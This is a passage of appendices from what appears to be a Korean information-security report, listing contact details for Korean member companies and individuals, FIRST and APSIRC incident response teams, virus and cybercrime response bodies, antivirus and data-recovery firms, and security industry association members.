189 전자우편 : secnsy@samsung.co.kr, tachyon@samsung.co.kr U R L : 삼성전자담당부서 : 전산실주소 : ( 우 ) 서울특별시강남구삼성동 삼화빌딩 10층담당자 : ( 정 ) 송창원, ( 부 ) 신기정전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cjpark@kininet.kiniti.re.kr, song@samsung.co.kr U R L : 삼성항공산업담당부서 : 보안팀주소 : ( 우 ) 서울특별시강남구역삼동 삼성역삼빌딩 14층담당자 : ( 정 ) 이장호, ( 부 ) 이현주전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : wanning@samsung.co.kr, guzzi@samsung.co.kr U R L : 삼양데이타시스템 ( 주 ) 담당부서 : 연구개발팀주소 : ( 우 ) 서울시종로구연지동 263 담당자 : ( 정 ) 김상수, ( 부 ) 김재영전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kims@samyang.co.kr, jkim@samyang.co.kr U R L : 선경유통담당자 : ( 정 ) 류등희, ( 부 ) 전화 : ( 정 ) , ( 부 ) 전자우편 : ryu@ts.skd.co.kr U R L : 소만사담당부서 : 개발부인터넷팀주소 : ( 우 ) 서울특별시송파구신천동 2905 송파벤쳐타운 804 담당자 : ( 정 ) 김대환, ( 부 ) 김정규전화 : ( 정 ) , ( 부 )

190 팩스 : ( 정 ) , ( 부 ) 전자우편 : kdh@somansa.co.kr/ jeongkyu@somansa.co.kr U R L : 신도리코담당부서 : 전산기획팀주소 : ( 우 ) 서울시성동구성수2가 3동 담당자 : ( 정 ) 장항순, ( 부 ) 우정하전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : TeddyJang@sindo.com, jhwoo@sindo.com U R L : 쌍용정보통신주소 : ( 우 ) 서울특별시중구충무로3가 60-1 극동빌딩 10층담당자 : ( 정 ) 김학성, ( 부 ) 배성렬전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : edel7021@sicc.co.kr U R L : 씨그마테크 ( 주 ) 담당부서 : 기술부주소 : ( 우 ) 서울시강남구역삼동 삼성제일빌딩 1515호담당자 : ( 정 ) 김종선, ( 부 ) 나용전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : john@sigmatec.co.kr, dragon@sigmatec.co.kr U R L : 아시아나항공담당부서 : 시스템기술팀주소 : ( 우 ) 서울특별시강서구오쇠동 47번지아시아나타운시스템기술팀담당자 : ( 정 ) 서광윤, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kyseo@asiana.co.kr U R L : 아이에스케이주소 : ( 우 ) 서울특별시강남구대치3동 ( 하림빌딩 4층 )

191 담당자 : ( 정 ) 김성, ( 부 ) 우현균전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sungkim@iskltd.com, hgwoo@iskltd.com U R L : 안진회계법인담당부서 : R&R 주소 : ( 우 ) 서울특별시영등포구여의도동 17 3번지삼환까뮤빌딩 5층담당자 : ( 정 ) 전괄, ( 부 ) 조도근전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : Kwal.chun@kr.arthurandersen.com, do.geun.jo@kr.arthurandersen.com U R L : 안철수컴퓨터바이러스연구소담당부서 : 연구개발실주소 : ( 우 ) 서울특별시서초구서초3동 ( 오영빌딩 4층 ) 담당자 : ( 정 ) 박준식, ( 부 ) 고정한, 조춘구전화 : ( 정 ) , ( 부 ) , 팩스 : ( 정 ) , ( 부 ) 전자우편 : parco@ahnlab.co.kr, chorus@ahnlab.co.kr, wtravel@ahnlab.co.kr U R L : 에스원담당부서 : 전략기획실정보사업팀주소 : ( 우 ) 서울시중구을지로1가삼성화재빌딩 9층담당자 : ( 정 ) 오경수, ( 부 ) 이상익전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kenney@samsung.co.kr,lsisys@samsung.co.kr U R L : 웅진출판사주식회사담당부서 : 정보시스템부시스템운영팀주소 : ( 우 ) 서울특별시종로구인의동 112-2번지웅진빌딩 6층정보시스템부담당자 : ( 정 ) 진현수, ( 부 ) 장재원전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : wmomo@wins.wip.co.kr, heliocjw@wins.wip.co.kr U R L :

192 웰넷정보통신주식회사담당부서 : 보안팀주소 : ( 우 ) 서울시강남구도곡동 941 오복빌딩 303호담당자 : ( 정 ) 김주영, ( 부 ) 이종일전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jykim@wellnet.co.kr, leeji@wellnet.co.kr U R L : 인젠담당부서 : 기술개발부주소 : ( 우 ) 대전광역시유성구도룡동 3-1 EXPO기념재단담당자 : ( 정 ) 이경미, ( 부 ) 노정석전화 : ( 정 )M , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kmlee@inzen.com, chester@inzen.com U R L : 인터넷시큐러티코리아담당부서 : 보안기술연구소주소 : ( 우 ) 서울특별시구로구신도림동 담당자 : ( 정 ) 강형자, ( 부 ) 제갈명전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : khj@security.co.kr, jkm@security.co.kr U R L : 제일씨엔씨담당부서 : 정보네트워크센터주소 : ( 우 ) 서울특별시중구남대문로 5가 500번지제일제당담당자 : ( 정 ) 장삼식, ( 부 ) 심재규전화 : ( 정 )(02) , ( 부 ) 팩스 : ( 정 )(02) , ( 부 ) 전자우편 : jangss@mai1.cj.co.kr, cc653sjk@cheiljedang.com U R L : 지텍담당부서 : SecureGT 주소 : ( 우 ) 서울서대문구충정로2가 8-2 충정로우체국 601호지텍담당자 : ( 정 ) 이재형, ( 부 ) 김용필전화 : ( 정 ) , ( 부 )

193 전자우편 : jhrhee@mai1.gt.co.kr, ypkim@mail.gt.co.kr U R L : 켁신시스템주소 : ( 우 ) 서울특별시강남구역삼동 마르코폴로빌딩 7층담당자 : ( 정 ) 이보형, ( 부 ) 신영우전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : wdlee@kexin.co.kr, ywshin@kexin.co.kr U R L : 테라담당부서 : 정보통신사업부주소 : ( 우 ) 서울특별시마포구서교동 담당자 : ( 정 ) 박상훈, ( 부 ) 이보영전화 : ( 정 ) , ( 부 ) (402) 팩스 : ( 정 ) , ( 부 ) 전자우편 : peter@terra.co.kr, yj@terra.co.kr U R L : 포스데이타담당부서 : SM기술부시스템기술팀주소 : ( 우 ) 경북포항시남구괴동 1번지포항제철본사빌딩 9층담당자 : ( 정 ) 이상대, ( 부 ) 나석영전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sdlee@smail.posco.co.kr, nasy@mai1.posdata.co.kr U R L : 퓨쳐시스템담당부서 : 정보통신연구소주소 : ( 우 ) 서울특별시서초구양재동 ( 양재경천빌딩 2층 ) 담당자 : ( 정 ) 엄봉식, ( 부 ) 박재경전화 : ( 정 ) (556), ( 부 ) (559) 팩스 : ( 정 ) , ( 부 ) 전자우편 : bsum@future.co.kr, jkpark@future.co.kr U R L : 하우리주소 : ( 우 ) 서울시광진구구의동 담당자 : ( 정 ) 권석철,

194 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sckwon@hauri.co.kr U R L : 한국디지탈 한국디지탈라인 ( 주 ) 담당부서 : 영업기획부주소 : ( 우 ) 서울특별시강남구논현동 261 현대인텔렉스빌딩 10층담당자 : ( 정 ) 정환석, ( 부 ) 김유신전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : hans@kdline.co.kr, entropia@kdline.co.kr U R L : 한솔텔레컴주소 : ( 우 ) 서울특별시서초구서초동 한솔PCS빌딩담당자 : ( 정 ) 심명기, ( 부 ) 전화 : ( 정 ) , ( 부 ) U R L : 한국실리콘그래픽스 한국썬마이크로스트템즈 한아시스템 한일정보통신담당부서 : 솔루션영업팀주소 : ( 우 ) 서울특별시강남구역삼동 우덕빌딩17층담당자 : ( 정 ) 이규호, ( 부 ) 김종훈전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : khlee@hann.co.kr, jhkim@hanil.co.kr U R L : 한전정보네트워크담당부서 : 산업정보망팀주소 : ( 우 ) 서울특별시영등포구여의도동 21번지한전사업담당자 : ( 정 ) 송순오, ( 부 ) 유주형

195 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sosong@iln.co.kr,loveyoo@iln.co.kr U R L : 현대정보기술담당부서 : 신비로사업팀주소 : ( 우 ) 서울특별시종로구적선동 66번지현대전자빌딩담당자 : ( 정 ) 박기웅, ( 부 ) 정호관전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : pkw@shinbiro.com, jhk@shinbiro.com U R L : 현대중공업담당부서 : 전산실정보통신팀주소 : ( 우 ) 울산광역시동구전화동 1번지담당자 : ( 정 ) 권길선, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : admin@hhi.co.kr U R L : 현대중공업담당부서 : 정보개발3부중장비전산실주소 : ( 우 ) 울산광역시동구전화동 1번지담당자 : ( 정 ) 김경대, ( 부 ) 전화 : ( 정 ) , ( 부 ) 전자우편 : sllicon@soback.kornet21.net U R L :

196 A3. 개인회원김상욱 ( 경북대학교 ) 주소 : ( 우 ) 대구광역시북구산격동 1370번지전화 : 팩스 : 전자우편 : kimsw@bh.kyungpook.ac.kr U R L : 김창수 ( 부경대학교 ) 주소 : ( 우 ) 부산시남구대연3동 부경대컴퓨터멀티미디어전화 : 팩스 : 전자우편 : cskim@dolphin.pknu.ac.kr U R L : 김판구 ( 조선대학교 ) 주소 : ( 우 ) 광주광역시동구서석동 375번지전화 : 팩스 : 전자우편 : pkkim@mina.chosun.ac.kr U R L : 류재철 ( 충남대학교 ) 주소 : ( 우 ) 대전광역시유성구궁동 220 담당자 : ( 정 ) 류재철전화 : ( 정 ) 팩스 : ( 정 ) 전자우편 : jcryou@esperosun.chungnam.ac.kr U R L : 박석호 ( 사이버패트롤 ) 박진섭 ( 대전대학교 ) 주소 : ( 우 ) 대전광역시동구용운동 96-3 전화 : 팩스 : 전자우편 : jspark@dragon.taejon.ac.kr U R L : 박태완 ( 에스큐브 )

197 주소 : ( 우 ) 서울시동작구신대방동 컴퓨터빌딩 705호전화 : 팩스 : 전자우편 : twpark@scube.co.kr U R L : 백석철부장 ( 한국정보인증 ( 주 )) 전화 : 전자우편 : scbaek@hohluil.com 오익균 ( 대통령비서실 ) 주소 : ( 우 ) 서울시종로구세종로 1번지전화 : 팩스 : 전자우편 : ikoh@cwd.go.kr U R L : 유황빈교수 ( 광운대학교 ) 주소 : ( 우 ) 서울시노원구월계동 전화 : 팩스 : 전자우편 : ryou@cs.kwangwoon.ac.kr U R L : netlab.kwangwoon.ac.kr 정진욱교수 ( 성균관대학교 ) 주소 : ( 우 ) 경기도수원시장안구천천동 300번지전화 : 팩스 : 전자우편 : jwchung@yurim.skku.ac.kr U R L : 정태명 ( 성균관대학교 ) 주소 : ( 우 ) 경기도수원시장안구천천동 300번지담당자 : 정태명전화 : 팩스 : 전자우편 :tmchung@simsan.skku.ac.kr U R L :

198 부록 B. FIRST ㆍ APSRIC 회원기관및연락처 B1. FIRST 회원기관및연락처 B2. APSRIC 회원기관및연락처

199 부록 B. FIRST ㆍ APSIRC 회원기관및연락처 B1. FIRST 회원기관및연락처 북ㆍ미 (55) 대응팀명칭 AFCERT ANS CO+RE Systems Apple Computer ASSIST AT&T BACIRT BadgIRT BCERT Bellcore CERT/CC CIAC CIRT Cisco Systems Cisco-PSIRT COMPAQ SSRT EDS EWA-Canada General Electric Computer Global Integrity Goldman, Sachs and Company GTCERT Hewlett-Packard Company HOUSECIRT IBM-ERS ISS IU-CERT MCI Motorola MxCERT NAI NASA Ames Research Center NASIRC NAVCIRT NCSA-IRST NEXTRA-CERT NIH CERT NIST/CSRC NU-CERT OSU-IRT Para-CERT PCERT Pennsylvania State University PruCERT 설명미공군 (Air Force CERT) 미극망사업자 (ANS) 애플컴퓨터 (Apple Computer WordWide) 미국방성 (DOD/Automated Systems Security Support Team) Customers of AT&T Internet services 미국은행 University of Wisconsin-Madison 보잉사 (Boeing CERT) AT&T 벨코어 (Bellcore) 카네기멜런대 (CERT Coordination Center) 미국에너지성 (DOE's Computer Incident Advisory Capabillty) 시티은행 (Citibank Computer Incident Response Team) 시스코 (CISCO System) Cisco Product Security Incident Response Team Software Security Response Team 미국 EDS(US EDS) GE & Coustomer Rapid Emergency Action Crisis Team Goldman Georgia Institute of Technology CERT HP US. House of Representatives Computer Incident Response Team IBM Emergency Response Service Internet Security Scanner 인디애나대학 (Indiana CERT) 미국 MCI 미국모토롤라 (Motorola CERT) 멕시코 (Mexican CERT) Network Associates 미국나사에임스연구센터미국나사 (NASA Automated Systems Incident Response Capability) 미해군 (Naval Computer Incident Response Team) 수퍼컴응용센터 (National Center for Supercomputing Applications) Nextra (Schweiz) AG 미국건강연구소 (National Institutes of Health) 미국표준기술연구소 (NIST) Northwestern University Ohio State University Incident Response Team Commercial incident response clients Purdue Computer Emergency Resp. Team Pennsylvania State University The Prudential Insurance Company

200 북ㆍ미 유럽 (28) 아ㆍ태 (5) 대응팀명칭 설명 Robert Owen Thomas Information security professionals SBACERT 중소기업관리청 (Small Business Administration) SGI Silicon Graphics Inc. SGI Sprint 망사업자 (SPRINT) SSRT DEC사 (DEC Software Security Response Team) SUN Microsystems, Inc SUN Microsystems SUNSeT Stanford University Network Team Trident Commercial and Government Customers TRW Inc TRW Network and System Administrators UCERT UNISYS CERT USHCERT 미국국회 (House of Representatives CERT) USWirt US West Incident Response Team BSL/GISA 독일정부연구소 CARNet-CERT 크로아티아학술연구망 CCTA 영국정부 CERT-IT 이탈리아인터넷 CERT-NASK 폴랜드인터넷 CERT-NL 네덜란드 SURFnet CERT-Renater 프랑스학술연구망 DANTE 유럽학술연구망 Defence Research Agency 영국국방망 DFN-CERT 독일학술연구망 DK-CERT 덴마크 CERT FreeBSD, Inc FreeBSD 사용자 IP+-CERT Swisscom Data IP-Plus Internet IRIS-CERT 이스라엘대학 IRIS-CERT 스페인 JANET-CERT 영국 JANET Micro-BIT Virus Center 바이러스센터 NORDUnet 노르웨이 OxCERT 옥스퍼드대학 (Oxford University IT Security Team) Siemens CERT Siemens Computer Emergency Response Team SNI-CERT CERT SNI-CERT CERT of Siemens-Nixdorf Informationssysteme SWITCH-CERT 스위스학술연구망 UNI-CERT 네덜란드 Unisource Business Networks NL BTCERTCC BT's UK Services certist Computer emergency response team Industries Services & Tertiaire CSIRT.DK Danish Computer Security Incident Response Team secu-cert SECUNET Computer Emergency Response Team UNTRAS HM Govt CERT AUSCERT 호주CERT CERTCC-KR 한국 ( 98. 1) ILAN-CERT Israeli Academic Network CERT JPCERT/CC 일본 ( 98. 8) SingCERT 싱가폴 ( )

201 AFCERT (U.S. Air Force CERT) Telephone: Telephone: Fax: ANS CO+RE Systems, Inc. (ANS) Telephone: Telephone: (emerg.) Fax: Apple Computer Telephone: Fax: ASSIST US. Department of Defense Automated System Security Incident Support Team Telephone: Fax: AT&T Telephone: Fax: AUSCERT (Australian Computer Emergency Response Team) Telephone: (24hr/7day) Fax: Bank of America CIRT (BACIRT) Telephone: Telephone: or (24x7x365) Fax: BadgIRT University of Wisconsin-Madison

202 Telephone: Fax: Bellcore Telephone: Fax: Boeing CERT (BCERT) Telephone: ; Telephone: (emerg.) Fax: BSI/GISA Telephone: Telephone: (emerg.) Fax: BTCERTCC - British Telecommunications Computer Emergency Response Team Co-ordination Centre btcertcc@boat.bt.com Telephone: Overseas UK Fax: CARNet CERT c-cert@carnet.hr Telephone: Fax: CCTA mick.morgan@ccta.gsi.gov.uk Telephone: Fax: CERT(R) Coordination Center (CERT/CC) cert@cert.org Telephone: Fax:

203 certist (computer emergency response team Industries Services & Tertiaire) Telephone: (8am-5pm Monday to Friday GMT +1/+2) Fax: CERT-IT Computer Emergency Response Team Italiano Telephone: Fax: CERTCC-KR Computer Emergency Response Team Korea Telephone: Fax: Cellular Phone: Pager: CERT-NASK Computer Emergency Response Team - Research and Academic Network in Poland cert@nask.pl Telephone: Fax: CERT-NL SURFnet is the Dutch academic, educational and research network cert-n1@surfnet.nl Telephone: Fax: CERT-Renater certsvp@renater.fr Telephone: Fax: CIAC US. Department of Energy's Computer Incident Advisory Capability ciac@llnl.gov Telephone: (24hr/7day) Fax: CIRT - Citigroup Computer Incident Response Team

204 Telephone: Fax: Cisco Systems (shared with Cisco PSIRT Team) Telephone: (approx. 07:30-18:00 GMT-0800, M-F) Pager: (request infosec-duty to be paged) Fax: (unsecured FAX, voic follow-up recommended) Cisco Product Security Incident Response Team (Cisco-PSIRT) (Emergencies only) (Non-emergency) (shared with Cisco internal team) Telephone: , (Emergencies only) Telephone: (approx. 11:00-19:00 GMT-0500, M-F) COMPAQ SSRT (Software Security Response Team) Telephone: (CSC), Emergency Phone: Pager: Fax: CSIRT.DK Danish Computer Security Incident Response Team Telephone: Fax: DANTE Delivery of Advanced Network Technology to Europe Ltd. Telephone: Fax: Defence Evaluation and Research Agency, Malvern, UK. Telephone: Fax:

205 DFN-CERT Fax: DK-CERT Danish Computer Emergency Response Team Telephone: Fax: EDS Telephone: Fax: EWA-Canada Telephone: Fax: FreeBSD, Inc. Telephone: General Electric Company Telephone: Fax: Goldman, Sachs and Company Telephone: Fax: GTCERT Georgia Institute of Technology CERT Telephone: Fax: Hewlett-Packard Company

206 HOUSECIRT US. House of Representatives Computer Incident Response Team Telephone: Pager: SKY-8888 pin Fax: IBM-ERS IBM Emergency Response Service Telephone: (8am - 5pm, EST/EDT (GMT-5/GMT-4)) Telephone: (after hours) Fax: Pager: , PIN ILAN-CERT - Israeli Academic Network CERT cert@cert.ac.il Telephone: Fax: IP+-CERT - Swisscom Data IP-P1us Internet Telephone: IRIS-CERT cert@rediris.es Telephone: or (9am - 6pm, MET (GMT+01)) Fax: ISS first-team@iss.net Telephone: Fax: IU-CERT - Indiana University first-team@iu.edu Telephone: (7:30am - 5:30pm EST [GMT-5]) Telephone: (after hours) Fax: JANET-CERT cert@cert.ja.net Telephone: Fax:

207 JPCERT/CC Japan Computer Emergency Response Team Coordination Center Telephone: (09:00-17:000 JST (GMT+0900), Monday - Friday) Fax: MCIWorldCom Inc. Gordon.Powell@wcom.com Telephone: Pager: Fax: Micro-BIT Virus Center ry15@uni-karlsruhe.de Telephone: Telephone: (emerg.) Fax: Motorola Comp. Emergency Resp. Team mcert@mot.com Telephone: (emerg.) Telephone: Fax: MxCERT (Mexican CERT) mxcert@mxcert.org.mx Telephone: Fax: Network Associates (Network Associates Labs) seclabs@nai.com Telephone: (8am-5pm GMT-8) Telephone: (emerg.) Fax: NASA Ames Research Center (Principle Center for Information Technology Security) ais@ames.arc.nasa.gov Telephone: Telephone: Telephone: (emerg.) Pager:

208 NASIRC NASA Automated Systems Incident Response Capability Telephone: (U.S.) Telephone: (International) 7:00 am to 7:00 pm EST Pager: SKY-PAGE Pin Fax: NAVCIRT (Naval Computer Incident Response Team) Telephone: Telephone: NAVCIRT ( ) Telephone: NCSA-IRST (National Center for Supercomputing Applications IRST) Telephone: (24hr/7day) Fax: NEXTRA-CERT - Nextra (Schweiz) AG cert@nextra.ch Telephone: Emergency Telephone: Fax: NIH CERT US. National Institutes of Health Kevin_Haney@nih.gov Telephone: Telephone: (emerg.) Fax: NIST/CSRC first-team@csmes.ncsl.nist.gov Telephone: Fax: NORDUnet cert@nordu.net Telephone: Fax:

209 NU-CERT Northwestern University Telephone: Fax: OSU-IRT - The Ohio State University Incident Response Team security@net.ohio-state.edu Telephone: Pager: or security@page.net.ohio-state.edu, first 2 lines of message will appear on pager. Fax: OxCERT Oxford University Security Team oxcert@ox.ac.uk Telephone: Voic Fax: Para-CERT - Para-Protect, Inc para-cert@para-protect.com Telephone: or PARA (24x7x365) Emergency Phone: same as above Fax: PCERT Purdue Computer Emergency Resp. Team pcert@cs.purdue.edu Telephone: Fax: PruCERT (The Prudential Insurance Company) first-team@prudential.com Telephone: Fax: Pennsylvania State University security@psu.edu Telephone: Fax: Global Integrity (an SAIC Company) Rapid Emergency Action Crisis Team (REACT) react@globalintegribty.com

210 Telephone: REACT-1-2 Fax: SBACERT - Small Business Administration howard.bolden@sba.gov Telephone: Fax: secu-cert (SECUNET Computer Emergency Response Team) security@secunet.de Telephone: Fax: SGI security-alert@sgi.com Web: search "security" Telephone: Fax: Siemens CERT (Siemens Computer Emergency Response Team) cert@cert.siemens.de Telephone: Fax: SingCERT (Singapore Computer Emergency Response Team) cert@singcert.org.sg Telephone: Fax: SNI-CERT CERT of Siemens-Nixdorf Informations systeme sni-cert@mch.sni.de Telephone: Fax: Sprint first-team@sprint.net Telephone: Fax: SUN Microsystems, Inc. security-alert@sun.com

211 Telephone: Fax: SUNSeT Stanford University Network Security Team Telephone: l Fax: SWITCH-CERT Swiss Academic and Research Network CERT Telephone: Fax: Robert Owen Thomas Telephone: Telephone: (emerg.) Fax: Trident Telephone: Fax: TRW Inc. Telephone: Fax: UCERT - UNISYS Computer Emergency Response Team (UCERT) barrie.brook@unisys.com Telephone: Fax: (not secure) Pager: (Numeric) UNI-CERT - KPN Telecom cert@uni-cert.nl Telephone: Emergency Telephone: Fax:

212 UNIRAS (HM Govt CERT) Telephone: Fax: USWirt - US West Incident Response Team wgaspar@uswest.com Telephone: (8am to 4pm US Mountain time, GMT-7/GMT-6) Fax: Pager:

213 B2. APSIRC 회원기관및연락처국가 : 오스트레일리아팀명칭 : AusCERT 전화 : 팩스 : auscert@auscert.org.au 홈페이지 : 국가 : 캄보디아전화 : (00) 팩스 : (00) 국가 : 중국팀명칭 : CERCERT 전화 : ccert-report@ocean.net.edu.cn 팩스 : 홈페이지 : 국가 : 홍콩 sfpang@hkpc.org 국가 : 인도네시아팀명칭 : ID-CERT 전화 : 팩스 : budi@globalnetlink.com, budi@vlsi.itb.ac.id 홈페이지 : 국가 : 일본팀명칭 : JPCERT/CC 전화 : (09:00-17:00 JST Monday-Friday) 팩스 : info@jpcert.or.jp 홈페이지 : 국가 : 한국팀명칭 : CERTCC-KR 전화 : 팩스 :

214 cert@certcc.or.kr 홈페이지 : 국가 : 말레이시아팀명칭 : MyCERT 전화 : 팩스 : mycert@mycert.mimos.my 홈페이지 : 국가 : 필리핀팀명칭 : Philippine Computer Emergency Response Teem info@phcert.org.ph 홈페이지 : 국가 : 싱가폴팀명칭 : SingCERT 전화 : (Mon-Fri 8:30am-5:00pm, Sat 8:30am-1:00pm) 팩스 : cert@singcert.org.sg 홈페이지 : 국가 : 타이완팀명칭 : TWCERT 전화 : 팩스 : www@service.cert.org.tw 홈페이지 : 국가 : 태국 charm@ksc.net.th 국가 : 베트남 thai@hanoi.ac.vn

215 부록 C. 바이러스대응기관연락처 C1. 한국정보보호센터컴퓨터바이러스전담반 C2 바이러스ㆍ해킹사고등컴퓨터범죄수사연락처 C3. 백신제작업체연락처 C4. 데이터백업및복구기술지원연락처 C5. 방역서비스긴급연락처

216 부록 C. 바이러스대응기관연락처 C1. 한국정보보호센터컴퓨터바이러스전담반 한국정보보호센터 CERTCC-KR 담당자 전화ㆍ팩스 전자우편 URL 비고 침해사고대응담당 ( 전화 )[02] , ( 팩스 ) ( 전화 )[02] , ( 팩스 ) cert@certcc.or.kr, virus-rep@certcc.or.kr 바이러스, 해킹등침해사고대응요청 C2. 바이러스ㆍ해킹사고등컴퓨터범죄수사연락처 대검찰청정보범죄수사센터 경찰청컴퓨터범죄수사대 전화ㆍ팩스 ( 전화 )[02] , ( 팩스 ) 전자우편 srpark@dci.sppo.go.kr URL 비고 정보범죄수사지휘, 대책수립 전화ㆍ팩스 [02] 전자우편 ccis@soback.kornet.nm.kr C3. 백신제작업체연락처 시만텍코리아 안철수컴퓨터바이러스연구소 트랜드코리아 하우리 전화ㆍ팩스 ( 전화 )[02] ,1 ( 팩스 ) 전자우편 jnlee@symantec.com URL 전화ㆍ팩스 전자우편 URL 전화ㆍ팩스 전자우편 URL ( 전화 )[02] , 7566 ( 팩스 ) y2k@ahnlab.co.kr ( 전화 )[02] , ( 팩스 ) kisung@trendmicro.co.kr 전화ㆍ팩스 ( 전화 )[02] , ( 팩스 ) 전자우편 hauri98@hauri.co.kr URL

217 C4. 데이터백업및복구기술지원연락처 명정보기술 ( 명데이타복구센터 ) 씨앤씨 ( 복구업체 ) 소프트랜드 ( 복구업체 ) 지오이네트 ( 백업업체 ) 전화ㆍ팩스 ( 전화 )[02] , ( 팩스 ) 전자우편 siyoo@myung.co.kr URL 전화ㆍ팩스 전자우편 URL ( 전화 )[02] ( 강남 ), ( 용산 ) webmaster@candc.co.kr 전화ㆍ팩스 ( 전화 )[02] 전자우편 hskim9916@softland.co.kr URL 전화ㆍ팩스 ( 전화 )[02] , ( 팩스 ) 전자우편 ernest@zoi.com URL C5. 방역서비스긴급연락처 에스원 ( 방역서비스업체 ) 전화ㆍ팩스 ( 전화 )[02] , ( 팩스 ) 전자우편 knam1@samsung.co.kr URL

218 부록 D. 한국정보보호산업협회회원사목록

219 부록 D. 한국정보보호산업협회회원사목록 회원사주소전화번호팩스번호홈페이지서울시영등포구여의도동 ( 주 ) 나일소프트 안원빌딩 2층 ( 주 ) 넥스텔서울시서초구서초동 ( 주 ) 넷소프트대전시서구둔산동 ( 제일정보통신 ) 한국담배인삼공사 7층대전시유성구봉명동 ( 주 ) 니츠 동아리조트오피스텔 1510호 ( 주 ) 데이타게이트인서울시영등포구여의도동 터내셔널교원공제회관빌딩 8층광주시동구금남로 3가 12-3 ( 주 ) 멀티정보 삼성화재호남본부빌딩 12층서울시관악구신림동 ( 주 ) 명경시스템 ( 유진B/D) 2층서울시강남구역삼동 ( 주 ) 명정보기술 동훈 B/D 401호서울시영등포구여의도동 ( 주 ) 삼영정보 금영빌딩 302호서울시강남구도곡동 553번지 ( 주 ) 삼호소프트 성신B/D 4층 r ( 주 ) 서울정보시스템서울시서초구서초동 ( 주 ) 세넥스테크놀로서울시광진구구의동 ~ 지구의S/W 지원센터 302호서울시송파구신천동 29-5 ( 주 ) 소만사 송파구청내송파벤처타운 804호 서울시강남구논현동105-7 ( 주 ) 시큐어소프트 두산빌딩 9층 r ( 주 ) 신우정보시스템대전시유성구도룡동 ( 주 ) 스탠다드네트워 ( 주 ) 시큐리티어쏘시 ( 주 ) 시큐리티테크놀서울시강남구논현동 61-4 서울시송파구신천동11-7 서울시영등포구여의도동15-11 크시스템에이츠로지스호산빌딩 3층교통회관 9층금영빌딩 호 ( 주 ) 신테크 서울시서초구서초동 선우빌딩 3층 ( 주 ) 안철수컴퓨터바서울시강남구삼성동 이러스연구소삼화빌딩 10층 ( 주 ) 에드버네트 서울시강남구역삼동636-1 석범빌딩 1층 ( 주 ) 에스원 서울시중구을지로 1가87번지삼성화재빌딩 9층 ( 주 ) 에스큐브 서울시동작구신대방동 ( 주 ) 에이앤에스 ( 본사 ) 서울시강남구역삼동 co.kr ( 주 ) 에이쓰리서울시강남구역삼동 시큐리티컨설팅유성빌딩 2층 ( 주 ) 엘지이디에스 서울시영등포구여의도동15-28 한국신용평가 빌딩 ( 주 ) 영캐드부산시사상구모라3동75-8 엔지니어링신모라공단 5층 ( 주 ) 와치텍 서울시영등포구여의도동44-1 대영빌딩 14층 대구시동구효목2동 ( 주 ) 웰컴정보시스템 데이콤BD 7층대구S/W지원센터 704호 ( 주 ) 윈소프트 서울시광진구구의동 한국S/W지원센터 401호

220 회원사주소전화번호팩스번호홈페이지서울시강남구역삼동 ( 주 ) 윈스테크놀리지 태양빌딩 7층서울시강남구역삼동 ( 주 ) 이니텍 유성빌딩 2층서울시강남구역삼동 ( 주 ) 인젠 서울벤처타운 1402호서울시구로구신도림동 ( 주 ) 인터넷시큐리티 하이테크빌딩 201호 ( 주 ) 장미디어서울시강남구청담동 인터렉티브은성빌딩 15층대전시유성구장동 ( 주 ) 지란지교소프트대전중소기업종합지원센터 호서울시강남구역삼동 ( 주 ) 켁신시스템 육성 B/D 8층 ( 주 ) 태흥데이타시스서울시서초구서초동 템선흥 B/D 7층서울시서초구양재동 ( 주 ) 퓨쳐시스템 양재경천빌딩서울시동작구대방동 49-6 ( 주 ) 하우리 유한양행빌딩 8층서울시강남구역삼동 832 ( 주 ) 한국지텍 영동빌딩 801호서울시강남구역삼동 ( 주 ) 한일정보통신 덕빌딩 ( 주 )LG-EDS 시스템 ( 인터넷사업팀 ) 인천시계양구효성 2 동 인터넷사업팀 경기시스템 ( 주 ) 서울시서초구양재동 동원빌딩 교보정보통신 ( 주 ) 서울시성북구성북동 노무라종합연구소서울시종로구서린동 33 서울지점영풍Bldg 11층 서울시강남구대치동 농심데이타시스템 해성2빌딩 6층 kr 닉스테크 ( 주 ) 서울시강남구양재동 5-6 옥토빌딩 7층 다스컴 ( 주 ) 서울시강남구논현동 성우빌딩 대우정보시스템주식서울시중구남대문로 5가 541 회사대우센터빌딩 대정아이앤씨 서울시영등포구여의도동 25-2 경호빌딩 6층 대이콤시스템테크놀서울시강남구역삼동 로지 ( 유 ) 한솔빌딩 델타정보통신 ( 주 ) 서울시서초구양재동 66번지성경빌딩 모다정보통신 ( 주 ) 서울시서초구서초3동 서울시강남구역삼동 삼성에스디에스 ( 주 ) 일옥빌딩 12총 co.kr 삼성SDS( 구전자 ) 서울시송파구신천동 월드타워빌딩 16층 